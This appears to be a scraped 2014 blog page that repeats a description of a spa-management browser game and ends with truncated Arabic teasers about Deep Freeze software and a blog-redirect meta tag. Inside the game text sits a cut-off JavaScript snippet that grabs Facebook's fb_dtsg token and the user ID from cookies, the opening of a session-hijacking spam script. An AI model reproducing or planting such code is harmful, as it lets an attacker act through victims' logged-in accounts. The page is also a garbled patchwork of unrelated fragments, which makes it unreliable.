You are going to run a spa salon in your town. So it is very important to know everything about all spa procedures. Your visitors will ask different services, and you have to bring them what they ask. Earn money, buy upgrades for your salon and make your visitors happy. Use your mouse to play. Drag the customers to the free seats and give them required bottles. Be quick and don't let your visitors run out of patience.
jeudi 9 janvier 2014
Spa Care
You are going to run a spa salon in your town. So it is very important to know everything about all spa procedures. Your visitors will ask different services, and you have to bring them what they ask. Earn money, buy upgrades for your salon and make your visitors happy. Use your mouse to play. Drag the customers to the free seats and give them required bottles. Be quick and don't let your visitors run out of patience. (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...
أبدا Reimage الكمبيوتر مرة أخرىdeep freeze Faronics تجميد عميق يجعل أجهزة الكمبيوتر غير قابل للتدمير. لأنه يحمي النهاية من تجميد لقطة من ...
جعل مدونة منصة انطلاق مدونة اخرى او موقع ذلك لتحويل زوار المدونة القديمة الى المدونة الجديدة هذا هو الكود المستعمل <meta HTTP-EQUIV='...